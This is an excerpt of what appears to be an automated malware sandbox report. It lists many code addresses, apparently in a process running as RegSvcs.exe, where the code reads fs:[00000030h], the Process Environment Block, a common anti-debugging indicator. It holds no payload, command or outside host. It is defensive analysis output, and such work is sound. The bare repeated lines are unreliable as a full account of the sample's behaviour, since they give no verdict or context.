                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_014A03E9 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_014A03E9 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_014A03E9 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_014A03E9 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_014A03E9 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_014C63FF mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_014AE3F0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_014AE3F0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_014AE3F0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_0148E388 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_0148E388 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_0148E388 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_014B438F mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_014B438F mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_01488397 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_01488397 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_01488397 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_0154A250 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_0154A250 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_0156625D mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_01496259 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_01518243 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01518243 mov ecx, dword ptr fs:[00000030h]7_2_01518243
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0148A250 mov eax, dword ptr fs:[00000030h]7_2_0148A250
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01540274 mov eax, dword ptr fs:[00000030h]7_2_01540274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01540274 mov eax, dword ptr fs:[00000030h]7_2_01540274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01540274 mov eax, dword ptr fs:[00000030h]7_2_01540274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01540274 mov eax, dword ptr fs:[00000030h]7_2_01540274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01540274 mov eax, dword ptr fs:[00000030h]7_2_01540274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01540274 mov eax, dword ptr fs:[00000030h]7_2_01540274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01540274 mov eax, dword ptr fs:[00000030h]7_2_01540274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01540274 mov eax, dword ptr fs:[00000030h]7_2_01540274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01540274 mov eax, dword ptr fs:[00000030h]7_2_01540274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01540274 mov eax, dword ptr fs:[00000030h]7_2_01540274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01540274 mov eax, dword ptr fs:[00000030h]7_2_01540274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01540274 mov eax, dword ptr fs:[00000030h]7_2_01540274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0148826B mov eax, dword ptr fs:[00000030h]7_2_0148826B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01494260 mov eax, dword ptr fs:[00000030h]7_2_01494260
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01494260 mov eax, dword ptr fs:[00000030h]7_2_01494260
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01494260 mov eax, dword ptr fs:[00000030h]7_2_01494260
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0148823B mov eax, dword ptr fs:[00000030h]7_2_0148823B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_015662D6 mov eax, dword ptr fs:[00000030h]7_2_015662D6
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0149A2C3 mov eax, dword ptr fs:[00000030h]7_2_0149A2C3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0149A2C3 mov eax, dword ptr fs:[00000030h]7_2_0149A2C3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0149A2C3 mov eax, dword ptr fs:[00000030h]7_2_0149A2C3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0149A2C3 mov eax, dword ptr fs:[00000030h]7_2_0149A2C3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0149A2C3 mov eax, dword ptr fs:[00000030h]7_2_0149A2C3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_014A02E1 mov eax, dword ptr fs:[00000030h]7_2_014A02E1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_014A02E1 mov eax, dword ptr fs:[00000030h]7_2_014A02E1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_014A02E1 mov eax, dword ptr fs:[00000030h]7_2_014A02E1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_014CE284 mov eax, dword ptr fs:[00000030h]7_2_014CE284
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_014CE284 mov eax, dword ptr fs:[00000030h]7_2_014CE284
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01510283 mov eax, dword ptr fs:[00000030h]7_2_01510283
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01510283 mov eax, dword ptr fs:[00000030h]7_2_01510283
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01510283 mov eax, dword ptr fs:[00000030h]7_2_01510283
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_015262A0 mov eax, dword ptr fs:[00000030h]7_2_015262A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_015262A0 mov ecx, dword ptr fs:[00000030h]7_2_015262A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_015262A0 mov eax, dword ptr fs:[00000030h]7_2_015262A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_015262A0 mov eax, dword ptr fs:[00000030h]7_2_015262A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_015262A0 mov eax, dword ptr fs:[00000030h]7_2_015262A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_015262A0 mov eax, dword ptr fs:[00000030h]7_2_015262A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01498550 mov eax, dword ptr fs:[00000030h]7_2_01498550
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01498550 mov eax, dword ptr fs:[00000030h]7_2_01498550
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_014C656A mov eax, dword ptr fs:[00000030h]7_2_014C656A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_014C656A mov eax, dword ptr fs:[00000030h]7_2_014C656A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_014C656A mov eax, dword ptr fs:[00000030h]7_2_014C656A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01526500 mov eax, dword ptr fs:[00000030h]7_2_01526500
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01564500 mov eax, dword ptr fs:[00000030h]7_2_01564500
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01564500 mov eax, dword ptr fs:[00000030h]7_2_01564500
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01564500 mov eax, dword ptr fs:[00000030h]7_2_01564500
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01564500 mov eax, dword ptr fs:[00000030h]7_2_01564500
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01564500 mov eax, dword ptr fs:[00000030h]7_2_01564500
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01564500 mov eax, dword ptr fs:[00000030h]7_2_01564500
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01564500 mov eax, dword ptr fs:[00000030h]7_2_01564500
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_014BE53E mov eax, dword ptr fs:[00000030h]7_2_014BE53E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_014BE53E mov eax, dword ptr fs:[00000030h]7_2_014BE53E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_014BE53E mov eax, dword ptr fs:[00000030h]7_2_014BE53E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_014BE53E mov eax, dword ptr fs:[00000030h]7_2_014BE53E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_014BE53E mov eax, dword ptr fs:[00000030h]7_2_014BE53E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_014A0535 mov eax, dword ptr fs:[00000030h]7_2_014A0535
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_014A0535 mov eax, dword ptr fs:[00000030h]7_2_014A0535
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_014A0535 mov eax, dword ptr fs:[00000030h]7_2_014A0535
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_014A0535 mov eax, dword ptr fs:[00000030h]7_2_014A0535
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_014A0535 mov eax, dword ptr fs:[00000030h]7_2_014A0535
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_014A0535 mov eax, dword ptr fs:[00000030h]7_2_014A0535
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_014CE5CF mov eax, dword ptr fs:[00000030h]7_2_014CE5CF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_014CE5CF mov eax, dword ptr fs:[00000030h]7_2_014CE5CF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_014965D0 mov eax, dword ptr fs:[00000030h]7_2_014965D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_014CA5D0 mov eax, dword ptr fs:[00000030h]7_2_014CA5D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_014CA5D0 mov eax, dword ptr fs:[00000030h]7_2_014CA5D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_014CC5ED mov eax, dword ptr fs:[00000030h]7_2_014CC5ED
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_014CC5ED mov eax, dword ptr fs:[00000030h]7_2_014CC5ED
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_014925E0 mov eax, dword ptr fs:[00000030h]7_2_014925E0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_014BE5E7 mov eax, dword ptr fs:[00000030h]7_2_014BE5E7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_014BE5E7 mov eax, dword ptr fs:[00000030h]7_2_014BE5E7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_014BE5E7 mov eax, dword ptr fs:[00000030h]7_2_014BE5E7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_014BE5E7 mov eax, dword ptr fs:[00000030h]7_2_014BE5E7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_014BE5E7 mov eax, dword ptr fs:[00000030h]7_2_014BE5E7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_014BE5E7 mov eax, dword ptr fs:[00000030h]7_2_014BE5E7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_014BE5E7 mov eax, dword ptr fs:[00000030h]7_2_014BE5E7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_014BE5E7 mov eax, dword ptr fs:[00000030h]7_2_014BE5E7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_014C4588 mov eax, dword ptr fs:[00000030h]7_2_014C4588
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01492582 mov eax, dword ptr fs:[00000030h]7_2_01492582
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01492582 mov ecx, dword ptr fs:[00000030h]7_2_01492582
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_014CE59C mov eax, dword ptr fs:[00000030h]7_2_014CE59C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_015105A7 mov eax, dword ptr fs:[00000030h]7_2_015105A7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_015105A7 mov eax, dword ptr fs:[00000030h]7_2_015105A7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_015105A7 mov eax, dword ptr fs:[00000030h]7_2_015105A7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_014B45B1 mov eax, dword ptr fs:[00000030h]7_2_014B45B1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_014B45B1 mov eax, dword ptr fs:[00000030h]7_2_014B45B1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0154A456 mov eax, dword ptr fs:[00000030h]7_2_0154A456
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_014CE443 mov eax, dword ptr fs:[00000030h]7_2_014CE443
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_014CE443 mov eax, dword ptr fs:[00000030h]7_2_014CE443
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_014CE443 mov eax, dword ptr fs:[00000030h]7_2_014CE443
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_014CE443 mov eax, dword ptr fs:[00000030h]7_2_014CE443
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_014CE443 mov eax, dword ptr fs:[00000030h]7_2_014CE443
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_014CE443 mov eax, dword ptr fs:[00000030h]7_2_014CE443
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_014CE443 mov eax, dword ptr fs:[00000030h]7_2_014CE443
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_014CE443 mov eax, dword ptr fs:[00000030h]7_2_014CE443
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_014B245A mov eax, dword ptr fs:[00000030h]7_2_014B245A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0148645D mov eax, dword ptr fs:[00000030h]7_2_0148645D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0151C460 mov ecx, dword ptr fs:[00000030h]7_2_0151C460
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_014BA470 mov eax, dword ptr fs:[00000030h]7_2_014BA470
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_014BA470 mov eax, dword ptr fs:[00000030h]7_2_014BA470
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_014BA470 mov eax, dword ptr fs:[00000030h]7_2_014BA470
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_014C8402 mov eax, dword ptr fs:[00000030h]7_2_014C8402
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_014C8402 mov eax, dword ptr fs:[00000030h]7_2_014C8402
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_014C8402 mov eax, dword ptr fs:[00000030h]7_2_014C8402
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0148E420 mov eax, dword ptr fs:[00000030h]7_2_0148E420
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0148E420 mov eax, dword ptr fs:[00000030h]7_2_0148E420
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0148E420 mov eax, dword ptr fs:[00000030h]7_2_0148E420
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0148C427 mov eax, dword ptr fs:[00000030h]7_2_0148C427
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01516420 mov eax, dword ptr fs:[00000030h]7_2_01516420
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01516420 mov eax, dword ptr fs:[00000030h]7_2_01516420
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01516420 mov eax, dword ptr fs:[00000030h]7_2_01516420
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01516420 mov eax, dword ptr fs:[00000030h]7_2_01516420
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01516420 mov eax, dword ptr fs:[00000030h]7_2_01516420
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01516420 mov eax, dword ptr fs:[00000030h]7_2_01516420
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01516420 mov eax, dword ptr fs:[00000030h]7_2_01516420
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_014CA430 mov eax, dword ptr fs:[00000030h]7_2_014CA430
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_014904E5 mov ecx, dword ptr fs:[00000030h]7_2_014904E5
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0154A49A mov eax, dword ptr fs:[00000030h]7_2_0154A49A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0151A4B0 mov eax, dword ptr fs:[00000030h]7_2_0151A4B0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_014964AB mov eax, dword ptr fs:[00000030h]7_2_014964AB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_014C44B0 mov ecx, dword ptr fs:[00000030h]7_2_014C44B0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_014C674D mov esi, dword ptr fs:[00000030h]7_2_014C674D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_014C674D mov eax, dword ptr fs:[00000030h]7_2_014C674D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_014C674D mov eax, dword ptr fs:[00000030h]7_2_014C674D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01514755 mov eax, dword ptr fs:[00000030h]7_2_01514755
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0151E75D mov eax, dword ptr fs:[00000030h]7_2_0151E75D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01490750 mov eax, dword ptr fs:[00000030h]7_2_01490750
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_014D2750 mov eax, dword ptr fs:[00000030h]7_2_014D2750
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_014D2750 mov eax, dword ptr fs:[00000030h]7_2_014D2750
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01498770 mov eax, dword ptr fs:[00000030h]7_2_01498770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_014A0770 mov eax, dword ptr fs:[00000030h]7_2_014A0770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_014A0770 mov eax, dword ptr fs:[00000030h]7_2_014A0770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_014A0770 mov eax, dword ptr fs:[00000030h]7_2_014A0770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_014A0770 mov eax, dword ptr fs:[00000030h]7_2_014A0770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_014A0770 mov eax, dword ptr fs:[00000030h]7_2_014A0770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_014A0770 mov eax, dword ptr fs:[00000030h]7_2_014A0770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_014A0770 mov eax, dword ptr fs:[00000030h]7_2_014A0770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_014A0770 mov eax, dword ptr fs:[00000030h]7_2_014A0770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_014A0770 mov eax, dword ptr fs:[00000030h]7_2_014A0770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_014A0770 mov eax, dword ptr fs:[00000030h]7_2_014A0770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_014A0770 mov eax, dword ptr fs:[00000030h]7_2_014A0770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_014A0770 mov eax, dword ptr fs:[00000030h]7_2_014A0770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_014CC700 mov eax, dword ptr fs:[00000030h]7_2_014CC700
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01490710 mov eax, dword ptr fs:[00000030h]7_2_01490710
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_014C0710 mov eax, dword ptr fs:[00000030h]7_2_014C0710
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0150C730 mov eax, dword ptr fs:[00000030h]7_2_0150C730
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_014CC720 mov eax, dword ptr fs:[00000030h]7_2_014CC720
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_014CC720 mov eax, dword ptr fs:[00000030h]7_2_014CC720
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_014C273C mov eax, dword ptr fs:[00000030h]7_2_014C273C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_014C273C mov ecx, dword ptr fs:[00000030h]7_2_014C273C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_014C273C mov eax, dword ptr fs:[00000030h]7_2_014C273C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0149C7C0 mov eax, dword ptr fs:[00000030h]7_2_0149C7C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_015107C3 mov eax, dword ptr fs:[00000030h]7_2_015107C3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_014B27ED mov eax, dword ptr fs:[00000030h]7_2_014B27ED
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_014B27ED mov eax, dword ptr fs:[00000030h]7_2_014B27ED
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_014B27ED mov eax, dword ptr fs:[00000030h]7_2_014B27ED
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0151E7E1 mov eax, dword ptr fs:[00000030h]7_2_0151E7E1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_014947FB mov eax, dword ptr fs:[00000030h]7_2_014947FB
